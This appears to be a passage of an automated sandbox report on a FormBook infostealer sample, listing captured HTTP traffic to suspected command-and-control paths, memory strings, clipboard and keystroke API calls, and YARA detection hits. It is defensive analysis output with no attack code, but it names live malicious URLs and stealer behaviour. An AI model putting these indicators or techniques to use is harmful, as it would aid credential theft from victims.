74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:46 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:49 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:52 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:55 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:09:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-Encodingx-frame-options: DENYx-request-id: 15e5395e-3d66-4581-b044-b646659ada2c-1714118940server-timing: processing;dur=9content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=15e5395e-3d66-4581-b044-b646659ada2c-1714118940x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=15e5395e-3d66-4581-b044-b646659ada2c-1714118940x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtXFLi0seRduO9M09Pycy5P3cnsxIqMxSSK%2BdoS4yyWR7J9%2FoR%2B3wtqTjEphu%2BXGDf8mLaFtpli7%2FSuCOxkZk43TKvc2wnhfendgRTw0ICMqz%2FW3V2wp1%2BcsJ25qBk9uKlHWIPy7PNep"}],"group":"cf-nel",Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:09:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-Encodingx-frame-options: DENYx-request-id: 2abd999f-56ef-41bf-803e-7d2177fc8dc9-1714118943server-timing: processing;dur=10content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2abd999f-56ef-41bf-803e-7d2177fc8dc9-1714118943x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2abd999f-56ef-41bf-803e-7d2177fc8dc9-1714118943x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59VEu%2BZzChuExk3ntbg%2BZZQJmj3sDro2l2wmeu5VJOzVY09u%2FUMh9fkslT%2F3cFFxeT1mdI6mdze%2BURssZatpXEyeKLHY8SVg7Ff98GW2ustNUOX8LrqXQnrmt6LFKb6BJAOqQhod02c4"}],"group":"cf-nel","maData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:09:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-Encodingx-frame-options: DENYx-request-id: 9a842b04-7650-448b-9163-2b6f6d30cec7-1714118946server-timing: processing;dur=4content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a842b04-7650-448b-9163-2b6f6d30cec7-1714118946x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a842b04-7650-448b-9163-2b6f6d30cec7-1714118946x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yJXvL8upT5JCSe5s8exfmyghNWtA7%2FiUuhobNIaMv04GJhTPS1xqt8yPzB4xom0uHDQmSBI1Tmospgq22s78398G8gPRbonhH6EH99axbz9KWjzymtkfwtL1uNi%2BydT7RKRbgE8B%2Bmbr"}],"group":"cf-nel","max_ageData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:09:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1X-Storefront-Renderer-Rendered: 1Vary: Accept-Encodingvary: Acceptx-frame-options: DENYcontent-security-policy: frame-ancestors 'none';x-shopid: x-shardid: -1powered-by: Shopifyserver-timing: processing;dur=6;desc="gc:1", asn;desc="174", edge;desc="MIA", country;desc="US", pageType;desc="404", servedBy;desc="kvn6", requestID;desc="d9ddf08f-c24f-46c0-9267-ccec356d2009-1714118949"x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1x-request-id: d9ddf08f-c24f-46c0-9267-ccec356d2009-1714118949CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0o65ni8lbvPNAsqB6LSetk6XT7862%2FFWykLyldTj%2BvyGqj7PmmgdOcoYaGPhwuAaWtgH6oxMFg%2FEsw3iiFhR%2BDH5tEyBI4BDrTQFuB48gjgEG1KRGrYRlh%2FgVY8gJdFMbOsEodGqstnX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=65.000057X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 87a516c9887a8daf-MIAalt-svc: hData Raw: Data Ascii:

Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3919213991.0000000005440000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3919213991.0000000005440000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com/fo8o/
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://accounts.shopify.com/recovery/stores?utm_source=gurucopy&utm_medium=link&utm_campaign=Gurus
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdn.shopify.com/s/files/1/0458/4836/3030/files/ShopifySans-Medium.woff2?v=1674610916
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdn.shopify.com/s/files/1/0458/4836/3030/files/ShopifySans-Regular.woff2?v=1674610915
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004782000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003E72000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004782000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003E72000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C36000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000004.00000003.1766426903.0000000007C86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 00000004.00000002.3918311897.000000000413A000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.000000000382A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi
Source: netbtugc.exe, 00000004.00000002.3918311897.000000000413A000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.000000000382A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://track.uc.cn/collect
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004DCA000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.00000000044BA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.empowermedeco.com/fo8o/?OVFPBtpp=mxnR
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003698000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?OVFPBtpp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4ds
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netbtugc.exe, 00000004.00000002.3918311897.000000000445E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003B4E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003B4E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.shopify.com/?utm_source=ExpiredDomainLink&utm_medium=textlink&utm_campaign=breadcrumb
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.shopify.com/admin/settings/domains

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00C3425A

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C34458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00C34458

Source: C:\Users\user\Desktop\150-425-2024.exe

0_2_00C3425A

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C20219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00C20219

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C4CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00C4CDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00BC3B4C
Source: 150-425-2024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 150-425-2024.exe, 00000000.00000000.1431945783.0000000000C75000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9612cf0c-2
